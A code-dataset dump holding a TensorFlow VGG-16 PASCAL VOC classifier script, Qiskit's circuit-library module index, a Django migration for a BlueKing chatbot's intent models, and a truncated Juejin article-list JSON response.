tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_2/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_2/biases')))
conv5_3 = vgg_conv(conv5_2, 512,
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_3/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/conv5/conv5_3/biases')))
pool5 = vgg_maxpool(conv5_3)
# dense
pool5_flat = tf.reshape(pool5, [-1, 512 * 7 * 7])
fc6 = vgg_dense(pool5_flat, 4096,
tf.constant_initializer(reader.get_tensor('vgg_16/fc6/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/fc6/biases')))
dropout1 = vgg_dropout(fc6)
fc7 = vgg_dense(dropout1, 4096,
tf.constant_initializer(reader.get_tensor('vgg_16/fc7/weights')),
tf.constant_initializer(reader.get_tensor('vgg_16/fc7/biases')))
dropout2 = vgg_dropout(fc7)
# Logits Layer
logits = vgg_dense(dropout2, 20, None, None)
predictions = {
# Generate predictions (for PREDICT and EVAL mode)
"classes": tf.argmax(input=logits, axis=1),
# Add `softmax_tensor` to the graph. It is used for PREDICT and by the
# `logging_hook`.
"probabilities": tf.nn.sigmoid(logits, name="sigmoid_tensor")
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)
# Calculate Loss (for both TRAIN and EVAL modes)
loss = tf.identity(tf.losses.sigmoid_cross_entropy(
multi_class_labels=labels, logits=logits), name='loss')
# Configure the Training Op (for TRAIN mode)
if mode == tf.estimator.ModeKeys.TRAIN:
lr = tf.train.exponential_decay(0.0001, tf.train.get_global_step(), 1000, 0.5)
optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9)
train_op = optimizer.minimize(
loss=loss,
global_step=tf.train.get_global_step())
tf.summary.scalar("learning rate", lr)
tf.summary.image("input image", input_layer[:3,:,:,:])
# for g, v in grads_and_vars:
# if g is not None:
# tf.summary.histogram("{}/grad_histogram".format(v.name), g)
# summary_hook = tf.train.SummarySaverHook(display, summary_op=tf.summary.merge_all())
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, train_op=train_op)
# Add evaluation metrics (for EVAL mode)
eval_metric_ops = {
"accuracy": tf.metrics.accuracy(
labels=labels, predictions=predictions["classes"])}
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)
def load_pascal(data_dir, split='train'):
"""
Function to read images from PASCAL data folder.
Args:
data_dir (str): Path to the VOC2007 directory.
split (str): train/val/trainval split to use.
Returns:
images (np.ndarray): Return a np.float32 array of
shape (N, H, W, 3), where H, W are 224px each,
and each image is in RGB format.
labels (np.ndarray): An array of shape (N, 20) of
type np.int32, with 0s and 1s; 1s for classes that
are active in that image.
"""
# Wrote this function
img_dir = data_dir + 'JPEGImages/'
label_dir = data_dir + 'ImageSets/Main/'
# read images
label_path = label_dir + split + '.txt'
file = open(label_path, 'r')
lines = file.readlines()
file.close()
img_num = len(lines)
first_flag = True
margin = (IMAGE_SIZE - IMAGE_CROP_SIZE) // 2
mean_value = [123, 116, 103]
mean_r = np.tile(np.array(mean_value[0]), (IMAGE_SIZE, IMAGE_SIZE))
mean_g = np.tile(np.array(mean_value[1]), (IMAGE_SIZE, IMAGE_SIZE))
mean_b = np.tile(np.array(mean_value[2]), (IMAGE_SIZE, IMAGE_SIZE))
mean = np.stack((mean_r, mean_g, mean_b), axis=2)
print(mean.shape)
if split != 'test':
img_list = np.zeros((len(lines), IMAGE_SIZE, IMAGE_SIZE, 3))
else:
img_list = np.zeros((len(lines), IMAGE_CROP_SIZE, IMAGE_CROP_SIZE, 3))
count = 0
for line in lines:
line = line[:6]
img_name = img_dir + line + '.jpg'
img = sci.imread(img_name)
img = sci.imresize(img, (IMAGE_SIZE, IMAGE_SIZE, 3))
img = np.subtract(img, mean)
if split == 'test':
img = img[margin:IMAGE_CROP_SIZE+margin, margin:IMAGE_CROP_SIZE+margin, :]
img_list[count, :, :, :] = img
count += 1
if count % 1000 == 1:
print(count)
print("finish loading images")
img_list = img_list.astype(np.float32)
img_list /= 255.0
img_list -= 0.5
img_list *= 2
# read labels
label_list = np.zeros((img_num, 20))
weight_list = np.zeros((img_num, 20))
cls_pos = 0
for class_name in CLASS_NAMES:
img_pos = 0
label_path = label_dir + class_name + '_' + split + '.txt'
# load images
file = open(label_path, 'r')
lines = file.readlines()
file.close()
for line in lines:
label = line.split()[1]
label = int(label)
if label == 1:
label_list[img_pos, cls_pos] = 1
weight_list[img_pos, cls_pos] = 1
# elif label == 0:
# label_list[img_pos, cls_pos] = 1
else:
weight_list[img_pos, cls_pos] = 1
img_pos += 1
cls_pos += 1
print("finish loading label")
img_list = img_list.astype(np.float32)
label_list = label_list.astype(np.int32)
weight_list = weight_list.astype(np.int32)
return img_list, label_list, weight_list
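# --- note (added): label/weight encoding produced by load_pascal ---
# VOC label files use 1 = positive, -1 = negative, 0 = "difficult".  As
# written above, label 1 yields (label=1, weight=1); both -1 and 0 fall
# through to the else branch as (label=0, weight=1), so the weight mask
# handed to compute_map is effectively all ones.  The commented-out elif
# shows the alternative of counting "difficult" samples as positives.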
def parse_args():
parser = argparse.ArgumentParser(
description='Train a classifier in tensorflow!')
parser.add_argument(
'data_dir', type=str, default='data/VOC2007',
help='Path to PASCAL data storage')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def _get_el(arr, i):
try:
return arr[i]
except IndexError:
return arr
# class _LoadHook(tf.train.SessionRunHook):
# '''define load pretrain model hook'''
# def begin(self):
# var_map = { 'vgg_16/conv1/conv1_1/weights' : 'conv2d_1/kernel',
# 'vgg_16/conv1/conv1_1/biases' : 'conv2d_1/bias',
# 'vgg_16/conv1/conv1_2/weights' : 'conv2d_2/kernel',
# 'vgg_16/conv1/conv1_2/biases' : 'conv2d_2/bias',
# 'vgg_16/conv2/conv2_1/weights' : 'conv2d_3/kernel',
# 'vgg_16/conv2/conv2_1/biases' : 'conv2d_3/bias',
# 'vgg_16/conv2/conv2_2/weights' : 'conv2d_4/kernel',
# 'vgg_16/conv2/conv2_2/biases' : 'conv2d_4/bias',
# 'vgg_16/conv3/conv3_1/weights' : 'conv2d_5/kernel',
# 'vgg_16/conv3/conv3_1/biases' : 'conv2d_5/bias',
# 'vgg_16/conv3/conv3_2/weights' : 'conv2d_6/kernel',
# 'vgg_16/conv3/conv3_2/biases' : 'conv2d_6/bias',
# 'vgg_16/conv3/conv3_3/weights' : 'conv2d_7/kernel',
# 'vgg_16/conv3/conv3_3/biases' : 'conv2d_7/bias',
# 'vgg_16/conv4/conv4_1/weights' : 'conv2d_8/kernel',
# 'vgg_16/conv4/conv4_1/biases' : 'conv2d_8/bias',
# 'vgg_16/conv4/conv4_2/weights' : 'conv2d_9/kernel',
# 'vgg_16/conv4/conv4_2/biases' : 'conv2d_9/bias',
# 'vgg_16/conv4/conv4_3/weights' : 'conv2d_10/kernel',
# 'vgg_16/conv4/conv4_3/biases' : 'conv2d_10/bias',
# 'vgg_16/conv5/conv5_1/weights' : 'conv2d_11/kernel',
# 'vgg_16/conv5/conv5_1/biases' : 'conv2d_11/bias',
# 'vgg_16/conv5/conv5_2/weights' : 'conv2d_12/kernel',
# 'vgg_16/conv5/conv5_2/biases' : 'conv2d_12/bias',
# 'vgg_16/conv5/conv5_3/weights' : 'conv2d_13/kernel',
# 'vgg_16/conv5/conv5_3/biases' : 'conv2d_13/bias',
# 'vgg_16/fc6/weights' : 'dense/kernel',
# 'vgg_16/fc6/biases' : 'dense/bias',
# 'vgg_16/fc7/weights' : 'dense_2/kernel',
# 'vgg_16/fc7/biases' : 'dense_2/bias'}
# tf.contrib.framework.init_from_checkpoint(PRETRAIN_MODEL_PATH, var_map)
def main():
args = parse_args()
# Load training and eval data
train_data, train_labels, train_weights = load_pascal(
args.data_dir, split='trainval')
eval_data, eval_labels, eval_weights = load_pascal(
args.data_dir, split='test')
# print pre-trained model structure
# checkpoint_path = os.path.join("vgg_16.ckpt")
# reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path)
# var_to_shape_map = reader.get_variable_to_shape_map()
# for key in sorted(var_to_shape_map):
# print("tensor_name: ", key)
# print(reader.get_tensor(key).shape)
pascal_classifier = tf.estimator.Estimator(
model_fn=partial(cnn_model_fn, num_classes=train_labels.shape[1]),
model_dir=MODEL_PATH)
tensors_to_log = {"loss": "loss"}
logging_hook = tf.train.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=100)
# loading_hook = _LoadHook()
# Train the model
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data, "w": train_weights},
y=train_labels,
batch_size=BATCH_SIZE,
num_epochs=None,
shuffle=True)
# Evaluate the model and print results
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": eval_data, "w": eval_weights},
y=eval_labels,
num_epochs=1,
shuffle=False)
map_list = []
step_list = []
for step in xrange(0, max_step, stride):
pascal_classifier.train(
input_fn=train_input_fn,
steps=stride,
hooks=[logging_hook])
# hooks=[logging_hook, loading_hook])
print("evaluate")
# eval_results = pascal_classifier.evaluate(input_fn=eval_input_fn)
# compute mAP
pred = list(pascal_classifier.predict(input_fn=eval_input_fn))
pred = np.stack([p['probabilities'] for p in pred])
rand_AP = compute_map(
eval_labels, np.random.random(eval_labels.shape),
eval_weights, average=None)
print('Random AP: {} mAP'.format(np.mean(rand_AP)))
gt_AP = compute_map(
eval_labels, eval_labels, eval_weights, average=None)
print('GT AP: {} mAP'.format(np.mean(gt_AP)))
AP = compute_map(eval_labels, pred, eval_weights, average=None)
print('Obtained {} mAP'.format(np.mean(AP)))
print('per class:')
for cid, cname in enumerate(CLASS_NAMES):
print('{}: {}'.format(cname, _get_el(AP, cid)))
# save mAP
map_list.append(np.mean(AP))
step_list.append(step)
if step % 10000 == 0:
fig = plt.figure()
plt.plot(step_list, map_list)
plt.title("mAP")
fig.savefig("task4_mAP_plot.jpg")
fig = plt.figure()
plt.plot(step_list, map_list)
plt.title("mAP")
fig.savefig("task4_mAP_plot.jpg")
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
e9b1a299486c6a98727862c462c3b949bf92b416 | 94c8dd4126da6e9fe9acb2d1769e1c24abe195d3 | /qiskit/circuit/library/__init__.py | 775bf9fdf67fe41e674f190ff83ba2983724d6da | [
"Apache-2.0"
] | permissive | levbishop/qiskit-terra | a75c2f96586768c12b51a117f9ccb7398b52843d | 98130dd6158d1f1474e44dd5aeacbc619174ad63 | refs/heads/master | 2023-07-19T19:00:53.483204 | 2021-04-20T16:30:16 | 2021-04-20T16:30:16 | 181,052,828 | 1 | 0 | Apache-2.0 | 2019-06-05T15:32:13 | 2019-04-12T17:20:54 | Python | UTF-8 | Python | false | false | 7,078 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
===============================================
Circuit Library (:mod:`qiskit.circuit.library`)
===============================================
.. currentmodule:: qiskit.circuit.library
Standard Gates
==============
.. autosummary::
:toctree: ../stubs/
Barrier
C3XGate
C3SXGate
C4XGate
CCXGate
DCXGate
CHGate
CPhaseGate
CRXGate
CRYGate
CRZGate
CSwapGate
CSXGate
CUGate
CU1Gate
CU3Gate
CXGate
CYGate
CZGate
HGate
IGate
MCPhaseGate
MCXGate
MCXGrayCode
MCXRecursive
MCXVChain
Measure
MSGate
PhaseGate
RCCXGate
RC3XGate
Reset
RGate
RXGate
RXXGate
RYGate
RYYGate
RZGate
RZZGate
RZXGate
ECRGate
SGate
SdgGate
SwapGate
iSwapGate
SXGate
SXdgGate
TGate
TdgGate
UGate
U1Gate
U2Gate
U3Gate
XGate
YGate
ZGate
Generalized Gates
=================
.. autosummary::
:toctree: ../stubs/
Diagonal
MCMT
MCMTVChain
Permutation
GMS
GR
GRX
GRY
GRZ
RVGate
Boolean Logic Circuits
======================
.. autosummary::
:toctree: ../stubs/
AND
OR
XOR
InnerProduct
Basis Change Circuits
=====================
.. autosummary::
:toctree: ../stubs/
QFT
Arithmetic Circuits
===================
Amplitude Functions
+++++++++++++++++++
.. autosummary::
:toctree: ../stubs/
LinearAmplitudeFunction
Functional Pauli Rotations
++++++++++++++++++++++++++
.. autosummary::
:toctree: ../stubs/
FunctionalPauliRotations
LinearPauliRotations
PolynomialPauliRotations
PiecewiseLinearPauliRotations
PiecewisePolynomialPauliRotations
PiecewiseChebyshev
Adders
++++++
.. autosummary::
:toctree: ../stubs/
WeightedAdder
Comparators
+++++++++++
.. autosummary::
:toctree: ../stubs/
IntegerComparator
Functions on binary variables
+++++++++++++++++++++++++++++
.. autosummary::
:toctree: ../stubs/
QuadraticForm
Amplitude Functions
===================
.. autosummary::
:toctree: ../stubs/
LinearAmplitudeFunction
Particular Quantum Circuits
===========================
.. autosummary::
:toctree: ../stubs/
FourierChecking
GraphState
HiddenLinearFunction
IQP
QuantumVolume
PhaseEstimation
GroverOperator
PhaseOracle
Probability distributions
=========================
.. autosummary::
:toctree: ../stubs/
UniformDistribution
NormalDistribution
LogNormalDistribution
N-local circuits
================
.. autosummary::
:toctree: ../stubs/
NLocal
TwoLocal
PauliTwoDesign
RealAmplitudes
EfficientSU2
ExcitationPreserving
QAOAAnsatz
Data encoding circuits
======================
.. autosummary::
:toctree: ../stubs/
PauliFeatureMap
ZFeatureMap
ZZFeatureMap
NCT (Not-CNOT-Toffoli) template circuits
========================================
.. autosummary::
:toctree: ../stubs/
templates.nct.template_nct_2a_1
templates.nct.template_nct_2a_2
templates.nct.template_nct_2a_3
templates.nct.template_nct_4a_1
templates.nct.template_nct_4a_2
templates.nct.template_nct_4a_3
templates.nct.template_nct_4b_1
templates.nct.template_nct_4b_2
templates.nct.template_nct_5a_1
templates.nct.template_nct_5a_2
templates.nct.template_nct_5a_3
templates.nct.template_nct_5a_4
templates.nct.template_nct_6a_1
templates.nct.template_nct_6a_2
templates.nct.template_nct_6a_3
templates.nct.template_nct_6a_4
templates.nct.template_nct_6b_1
templates.nct.template_nct_6b_2
templates.nct.template_nct_6c_1
templates.nct.template_nct_7a_1
templates.nct.template_nct_7b_1
templates.nct.template_nct_7c_1
templates.nct.template_nct_7d_1
templates.nct.template_nct_7e_1
templates.nct.template_nct_2a_1
templates.nct.template_nct_9a_1
templates.nct.template_nct_9c_1
templates.nct.template_nct_9c_2
templates.nct.template_nct_9c_3
templates.nct.template_nct_9c_4
templates.nct.template_nct_9c_5
templates.nct.template_nct_9c_6
templates.nct.template_nct_9c_7
templates.nct.template_nct_9c_8
templates.nct.template_nct_9c_9
templates.nct.template_nct_9c_10
templates.nct.template_nct_9c_11
templates.nct.template_nct_9c_12
templates.nct.template_nct_9d_1
templates.nct.template_nct_9d_2
templates.nct.template_nct_9d_3
templates.nct.template_nct_9d_4
templates.nct.template_nct_9d_5
templates.nct.template_nct_9d_6
templates.nct.template_nct_9d_7
templates.nct.template_nct_9d_8
templates.nct.template_nct_9d_9
templates.nct.template_nct_9d_10
Clifford template circuits
==========================
.. autosummary::
:toctree: ../stubs/
clifford_2_1
clifford_2_2
clifford_2_3
clifford_2_4
clifford_3_1
clifford_4_1
clifford_4_2
clifford_4_3
clifford_4_4
clifford_5_1
clifford_6_1
clifford_6_2
clifford_6_3
clifford_6_4
clifford_6_5
clifford_8_1
clifford_8_2
clifford_8_3
RZXGate template circuits
=========================
.. autosummary::
:toctree: ../stubs/
rzx_yz
rzx_xz
rzx_cy
rzx_zz1
rzx_zz2
rzx_zz3
"""
from .standard_gates import *
from .templates import *
from ..barrier import Barrier
from ..measure import Measure
from ..reset import Reset
from .blueprintcircuit import BlueprintCircuit
from .generalized_gates import (
Diagonal,
MCMT,
MCMTVChain,
Permutation,
GMS,
GR,
GRX,
GRY,
GRZ,
RVGate
)
from .boolean_logic import (
AND,
OR,
XOR,
InnerProduct,
)
from .basis_change import QFT
from .arithmetic import (
FunctionalPauliRotations,
LinearPauliRotations,
PiecewiseLinearPauliRotations,
PiecewisePolynomialPauliRotations,
PolynomialPauliRotations,
IntegerComparator,
WeightedAdder,
QuadraticForm,
LinearAmplitudeFunction,
PiecewiseChebyshev,
)
from .n_local import (
NLocal,
TwoLocal,
PauliTwoDesign,
RealAmplitudes,
EfficientSU2,
ExcitationPreserving,
QAOAAnsatz
)
from .data_preparation import (
PauliFeatureMap,
ZFeatureMap,
ZZFeatureMap
)
from .probability_distributions import (
LogNormalDistribution,
NormalDistribution,
UniformDistribution
)
from .quantum_volume import QuantumVolume
from .fourier_checking import FourierChecking
from .graph_state import GraphState
from .hidden_linear_function import HiddenLinearFunction
from .iqp import IQP
from .phase_estimation import PhaseEstimation
from .grover_operator import GroverOperator
from .phase_oracle import PhaseOracle
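# --- usage sketch (added; not part of this module) ---
# from qiskit.circuit.library import QFT
# qft = QFT(3)                   # 3-qubit quantum Fourier transform block
# print(qft.decompose().draw())  # expand it into elementary gates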
| [
"[email protected]"
] | |
10f403c415e3258aa195e50df38424e21966e650 | c67831f476cb530fc0c26e0bf4258ce18e986749 | /module_intent/migrations/0001_initial.py | f9fde504260720388d163863648d863149e5b7ff | [
"MIT"
] | permissive | cz-qq/bk-chatbot | a3ce4b86452b3de0ff35430c1c85b91d6b23a3e6 | da37fb2197142eae32158cdb5c2b658100133fff | refs/heads/master | 2023-06-05T05:48:22.083008 | 2021-06-15T10:21:30 | 2021-06-15T10:21:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,294 | py | """
TencentBlueKing is pleased to support the open source community by making
蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.
Copyright (C) 2017-2018 THL A29 Limited,
a Tencent company. All rights reserved.
Licensed under the MIT License (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.db import migrations, models
import module_intent.models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Intent",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"biz_id",
models.PositiveIntegerField(
db_index=True, default=0, verbose_name="业务ID"
),
),
(
"biz_name",
models.CharField(default="", max_length=128, verbose_name="业务名称"),
),
(
"intent_name",
models.CharField(default="", max_length=128, verbose_name="意图名称"),
),
("status", models.BooleanField(default=False, verbose_name="意图状态")),
(
"available_user",
module_intent.models.CompressJSONField(
default=[], verbose_name="可执行用户"
),
),
(
"available_group",
module_intent.models.CompressJSONField(
default=[], verbose_name="可执行群组"
),
),
("is_delete", models.BooleanField(default=False, verbose_name="是否已删除")),
(
"create_by",
models.CharField(default="-", max_length=100, verbose_name="创建人"),
),
(
"create_time",
models.DateTimeField(auto_now=True, verbose_name="创建时间"),
),
(
"update_time",
models.DateTimeField(auto_now=True, verbose_name="更新时间"),
),
],
options={
"verbose_name": "【意图】",
"verbose_name_plural": "【意图】",
},
),
migrations.CreateModel(
name="Task",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"biz_id",
models.PositiveIntegerField(
db_index=True, default=0, verbose_name="业务ID"
),
),
("index_id", models.BigIntegerField(default=-1, verbose_name="索引ID")),
(
"platform",
models.CharField(
choices=[
("JOB", "JOB"),
("SOPS", "标准运维"),
("DEVOPS", "蓝盾"),
("DEFINE", "自定义"),
],
default="JOB",
max_length=128,
verbose_name="平台名称",
),
),
(
"task_id",
models.CharField(
default="JOB", max_length=128, verbose_name="任务ID"
),
),
(
"slots",
module_intent.models.CompressJSONField(
default=[], verbose_name="槽位信息"
),
),
(
"source",
module_intent.models.CompressJSONField(
default={}, verbose_name="任务元数据"
),
),
("script", models.TextField(default="", verbose_name="执行脚本信息")),
],
options={
"verbose_name": "【任务信息】",
"verbose_name_plural": "【任务信息】",
},
),
migrations.CreateModel(
name="Utterances",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"biz_id",
models.PositiveIntegerField(
db_index=True, default=0, verbose_name="业务ID"
),
),
("index_id", models.BigIntegerField(default=-1, verbose_name="索引ID")),
(
"content",
module_intent.models.CompressJSONField(
default=[], verbose_name="语料列表"
),
),
],
options={
"verbose_name": "【语料库】",
"verbose_name_plural": "【语料库】",
},
),
]
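# -- Illustrative sketch, not part of the generated migration ----------------
# The migration above references ``module_intent.models.CompressJSONField``,
# a custom field defined in module_intent/models.py (not shown here). A
# hypothetical minimal implementation of such a field -- JSON that is
# zlib-compressed and base64-encoded on top of a TextField -- could look like:
import base64
import json
import zlib


class IllustrativeCompressJSONField(models.TextField):
    """Hypothetical sketch: store a Python object as compressed JSON text."""

    def get_prep_value(self, value):
        # Serialise -> compress -> base64-encode before writing to the DB.
        raw = json.dumps(value).encode("utf-8")
        return base64.b64encode(zlib.compress(raw)).decode("ascii")

    def from_db_value(self, value, expression, connection):
        # base64-decode -> decompress -> deserialise when reading back.
        if value is None:
            return value
        return json.loads(zlib.decompress(base64.b64decode(value)))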
| [
"[email protected]"
] | |
611985b190db12a4bf84c0ef33c07bd98b4dab22 | 3d7039903da398ae128e43c7d8c9662fda77fbdf | /database/前端/juejin_2606.py | c4de48dbcffe8284cf97c951040c5747724d3210 | [] | no_license | ChenYongChang1/spider_study | a9aa22e6ed986193bf546bb567712876c7be5e15 | fe5fbc1a5562ff19c70351303997d3df3af690db | refs/heads/master | 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69,539 | py | {"err_no": 0, "err_msg": "success", "data": [{"article_id": "6995469197673234469", "article_info": {"article_id": "6995469197673234469", "user_id": "1996368848373357", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640528267706382], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "写给走近webpack的自己:webpack notebook", "brief_content": "前言: hello guys!注意标题~ 本文旨在记录学习、自娱自乐。 如果能帮到一些同样对webpack不甚了解的同学我会很开心,但请各路神仙勿喷勿喷哈。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628759709", "mtime": "1628846868", "rtime": "1628759911", "draft_id": "6995067141565186085", "view_count": 219, "collect_count": 4, "digg_count": 7, "comment_count": 1, "hot_index": 18, "is_hot": 0, "rank_index": 0.00299562, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1996368848373357", "user_name": "进击的Oliver", "company": "北京邮电大学", "job_title": "蚂蚁体验技术部-前端实习", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/d89085d9ea0cc4bd53791e9a8521f81d~300x300.image", "level": 2, "description": "前端大四小白!", "followee_count": 16, "follower_count": 37, "post_article_count": 20, "digg_article_count": 30, "got_digg_count": 167, "got_view_count": 8761, "post_shortmsg_count": 2, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 0, "power": 254, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546614, "tag_id": "6809640528267706382", "tag_name": "Webpack", "color": "#6F94DB", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/73e856b07f83b4231c1e.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1440920866, "mtime": 1631692726, "id_type": 9, "tag_alias": "", "post_article_count": 6704, "concern_user_count": 204077}], "user_interact": {"id": 6995469197673234469, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": 
{"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "6914109129267740686", "article_info": {"article_id": "6914109129267740686", "user_id": "940837683346984", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/956f3fca6ccb45a09f7d6611955a0f54~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "面试不再怕:史上最全的cookie知识点详解", "brief_content": "我们知道,HTTP是一种无状态协议,无状态是指服务端对于客户端每次发送的请求都认为它是一个新的请求,上一次会话和下一次会话没有联系。 但是,很多场景下,我们需要知道下一次的会话和上一次的会话的关系(比如登陆之后我们需要记住登陆状态),这个时候就引入了Cookie和Session…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1609816548", "mtime": "1609929498", "rtime": "1609820099", "draft_id": "6913812547716169735", "view_count": 2927, "collect_count": 164, "digg_count": 86, "comment_count": 16, "hot_index": 248, "is_hot": 0, "rank_index": 0.0029949, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "940837683346984", "user_name": "无束", "company": "", "job_title": "前端@字节|前阿里、百度、360", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/ad58ae6bd92f08133c1922ede6ce29c6~300x300.image", "level": 2, "description": "公众号「静夜思码」", "followee_count": 49, "follower_count": 18, "post_article_count": 6, "digg_article_count": 64, "got_digg_count": 139, "got_view_count": 6516, "post_shortmsg_count": 1, "digg_shortmsg_count": 3, "isfollowed": false, "favorable_author": 0, "power": 204, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}], "user_interact": {"id": 6914109129267740686, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "202109151607060102122012180C00106D"}, {"article_id": "6996996742612779021", "article_info": {"article_id": "6996996742612779021", "user_id": "4089838984239357", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/557b2129c0e14ee8a49707c0c00a594a~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "这🍬好甜!Vue3 新语法糖 script setup ", "brief_content": "<script setup>是Vue3.2正式支持的一个语法糖,在<script setup>中的代码就像是在setup()函数中一样,所有顶级变量、函数、导入的组件都会暴露给模板使用", 
"is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629115300", "mtime": "1629170117", "rtime": "1629170117", "draft_id": "6996992611135275039", "view_count": 263, "collect_count": 3, "digg_count": 2, "comment_count": 0, "hot_index": 15, "is_hot": 0, "rank_index": 0.0029948, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4089838984239357", "user_name": "Sunly", "company": "", "job_title": "前端工程师", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/11/20/1673017215671f1d~tplv-t2oaga2asx-image.image", "level": 1, "description": "", "followee_count": 1, "follower_count": 0, "post_article_count": 1, "digg_article_count": 15, "got_digg_count": 2, "got_view_count": 263, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 4, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, 